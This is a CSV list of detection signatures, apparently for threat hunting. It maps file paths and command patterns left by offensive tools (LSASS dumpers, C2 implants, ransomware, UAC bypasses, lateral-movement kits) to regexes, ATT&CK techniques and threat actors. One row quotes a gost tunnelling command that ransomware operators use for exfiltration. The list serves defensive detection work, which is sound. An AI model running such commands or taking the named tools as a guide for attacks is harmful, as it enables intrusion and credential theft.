"*C:\ProgramData\1.ps1*",".{0,1000}C\:\\ProgramData\\1\.ps1.{0,1000}","offensive_tool_keyword","POC","suspicious script name and path used by attackers","T1059.001","TA0002","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","36574"
"*C:\ProgramData\Prefetch\na.exe*",".{0,1000}C\:\\ProgramData\\Prefetch\\na\.exe.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","36575"
"*C:\ProgramData\SystemData\microsoft_Windows.dll*",".{0,1000}C\:\\ProgramData\\SystemData\\microsoft_Windows\.dll.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","N/A","N/A","Exploitation tool","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","36576"
"*c:\pwned.txt*",".{0,1000}c\:\\pwned\.txt.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","36577"
"*c:\pwned_exec.txt*",".{0,1000}c\:\\pwned_exec\.txt.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","N/A","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","36578"
"*C:\SPRAY_*.dmp*",".{0,1000}C\:\\SPRAY_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","36579"
"*C:\Temp\*-*.kirbi*",".{0,1000}C\:\\Temp\\.{0,1000}\-.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","36580"
"*C:\temp\c2.pdf*",".{0,1000}C\:\\temp\\c2\.pdf.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","36581"
"*C:\Temp\C3Store*",".{0,1000}C\:\\Temp\\C3Store.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","36582"
"*C:\Temp\file.exe*",".{0,1000}C\:\\Temp\\file\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","36583"
"*c:\temp\history.csv*",".{0,1000}c\:\\temp\\history\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36584"
"*c:\temp\history.html*",".{0,1000}c\:\\temp\\history\.html.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36585"
"*c:\temp\history.txt*",".{0,1000}c\:\\temp\\history\.txt.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","36586"
"*C:\temp\iamahacker.txt*",".{0,1000}C\:\\temp\\iamahacker\.txt.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","36587"
"*c:\temp\nc.exe*",".{0,1000}c\:\\temp\\nc\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","36588"
"*C:\Temp\poc.txt*",".{0,1000}C\:\\Temp\\poc\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","36589"
"*c:\temp\something.ps1*",".{0,1000}c\:\\temp\\something\.ps1.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","36590"
"*C:\temp\testlog\mylogdddd.blf.blf*",".{0,1000}C\:\\temp\\testlog\\mylogdddd\.blf\.blf.{0,1000}","offensive_tool_keyword","POC","Windows Privilege escalation POC exploitation for CVE-2024-49138","T1068 - T1058 - T1203","TA0004","N/A","N/A","Privilege Escalation","https://github.com/emdnaia/CVE-2024-49138-POC","1","0","N/A","N/A","9","1","1","0","2025-01-15T01:01:21Z","2025-01-15T02:11:49Z","36591"
"*C:\temp\tmp.tmp*",".{0,1000}C\:\\temp\\tmp\.tmp.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","36592"
"*C:\Uac\results.cab*",".{0,1000}C\:\\Uac\\results\.cab.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","N/A","10","2","182","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z","36593"
"*C:\Users\*\AppData\Local\Temp\performance_636_3000_1.dll*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Local\\Temp\\performance_636_3000_1\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","36594"
"*C:\Users\*\AppData\Roaming\Indexing.*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\Indexing\..{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","36595"
"*C:\Users\*\AppData\Roaming\svchost.exe*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\svchost\.exe.{0,1000}","offensive_tool_keyword","chaos","Chaos ransomware behavior","T1486","TA0040","chaos ransomware","N/A","Ransomware","https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","36596"
"*C:\Users\*\lsass_*.dmp*",".{0,1000}C\:\\Users\\.{0,1000}\\lsass_.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","DumpNParse","A Combination LSASS Dumper and LSASS Parser","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/icyguider/DumpNParse","1","0","N/A","N/A","10","2","150","24","2021-11-21T14:25:24Z","2021-11-21T14:18:42Z","36597"
"*C:\Users\cyberstair\*",".{0,1000}C\:\\Users\\cyberstair\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","36598"
"*c:\users\public\*.dll*",".{0,1000}c\:\\users\\public\\.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","_","dll file in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://detect.fyi/rhysida-ransomware-and-the-detection-opportunities-3599e9a02bb2","1","0","N/A","observed with PortStarter DLL","10","10","N/A","N/A","N/A","N/A","36600"
"*C:\Users\Public\*.dmp*",".{0,1000}C\:\\Users\\Public\\.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36601"
"*C:\Users\Public\backup.enc*",".{0,1000}C\:\\Users\\Public\\backup\.enc.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","36602"
"*c:\users\public\creds.log*",".{0,1000}c\:\\users\\public\\creds\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","36603"
"*c:\Users\Public\Documents\log.txt*",".{0,1000}c\:\\Users\\Public\\Documents\\log\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","36604"
"*C:\Users\Public\example.txt*",".{0,1000}C\:\\Users\\Public\\example\.txt.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","N/A","N/A","9","3","292","60","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z","36605"
"*c:\users\public\output.txt*",".{0,1000}c\:\\users\\public\\output\.txt.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","N/A","9","1","11","2","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z","36606"
"*C:\Users\Public\perm.txt*",".{0,1000}C\:\\Users\\Public\\perm\.txt.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","36607"
"*C:\Users\Public\syslog.dat*",".{0,1000}C\:\\Users\\Public\\syslog\.dat.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","36608"
"*C:\Users\Public\syslog.zip*",".{0,1000}C\:\\Users\\Public\\syslog\.zip.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","N/A","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","36609"
"*C:\Users\Public\test.txt*",".{0,1000}C\:\\Users\\Public\\test\.txt.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","36610"
"*C:\Users\username\command_log.txt*",".{0,1000}C\:\\Users\\username\\command_log\.txt.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","#content","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","36611"
"*C:\Users\username\payload.exe*",".{0,1000}C\:\\Users\\username\\payload\.exe.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","#content","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","36612"
"*C:\Windows \System32*",".{0,1000}C\:\\Windows\s\\System32.{0,1000}","offensive_tool_keyword","_","Bypass UAC by Mocking Trusted Directories","T1548.002","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","suspicious path","10","10","N/A","N/A","N/A","N/A","36613"
"*C:\Windows\DirectX.log*\Windows\Temp\backup.log*",".{0,1000}C\:\\Windows\\DirectX\.log.{0,1000}\\Windows\\Temp\\backup\.log.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","0","N/A","N/A","10","3","244","44","2025-01-25T16:30:56Z","2021-08-08T08:53:03Z","36615"
"*C:\Windows\System.exe* -L rtcp://0.0.0.0:8087/127.0.0.1:4444 -F socks5://*:*@*:443*",".{0,1000}C\:\\Windows\\System\.exe.{0,1000}\s\-L\srtcp\:\/\/0\.0\.0\.0\:8087\/127\.0\.0\.1\:4444\s\-F\ssocks5\:\/\/.{0,1000}\:.{0,1000}\@.{0,1000}\:443.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities (<https://github.com/ginuerzh/gost>) in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","36617"
"*C:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\bcdedit.exe 1> bcdedit 2>&1*",".{0,1000}C\:\\Windows\\system32\\cmd\.exe\s\/c\sC\:\\Windows\\Sysnative\\bcdedit\.exe\s1\>\sbcdedit\s2\>\&1.{0,1000}","offensive_tool_keyword","Smbtouch-Scanner","Smbtouch detect whether the target is vulnerable of one of these vulnerabilities: ETERNALBLUE - ETERNALCHAMPION - ETERNALROMANCE - ETERNALSYNERGY","T1210 - T1046 - T1133","TA0007 - TA0043 - TA0008","N/A","APT15 - Turla","Lateral Movement","https://github.com/3gstudent/Smbtouch-Scanner","1","0","N/A","N/A","10","2","140","66","2021-04-17T01:42:06Z","2017-04-21T01:38:55Z","36618"
"*c:\windows\temp\blah.txt*",".{0,1000}c\:\\windows\\temp\\blah\.txt.{0,1000}","offensive_tool_keyword","PowerUpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","36621"
"*c:\windows\temp\blah.txt*",".{0,1000}c\:\\windows\\temp\\blah\.txt.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","PowerUpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","36622"
"*C:\windows\temp\Coredump.dmp*",".{0,1000}C\:\\windows\\temp\\Coredump\.dmp.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","36623"
"*C:\Windows\Temp\move.exe*",".{0,1000}C\:\\Windows\\Temp\\move\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","0","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","36624"
"*C:\Windows\Temp\moveme.exe*",".{0,1000}C\:\\Windows\\Temp\\moveme\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","0","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","36625"
"*c:\windows\temp\test.tmp farmer*",".{0,1000}c\:\\windows\\temp\\test\.tmp\sfarmer.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Credential Access","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","N/A","10","4","379","61","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z","36626"
"*c:\windows\temp\test1.txt*",".{0,1000}c\:\\windows\\temp\\test1\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36627"
"*c:\windows\temp\test2.txt*",".{0,1000}c\:\\windows\\temp\\test2\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36628"
"*c:\windows\temp\test3.txt*",".{0,1000}c\:\\windows\\temp\\test3\.txt.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","36629"
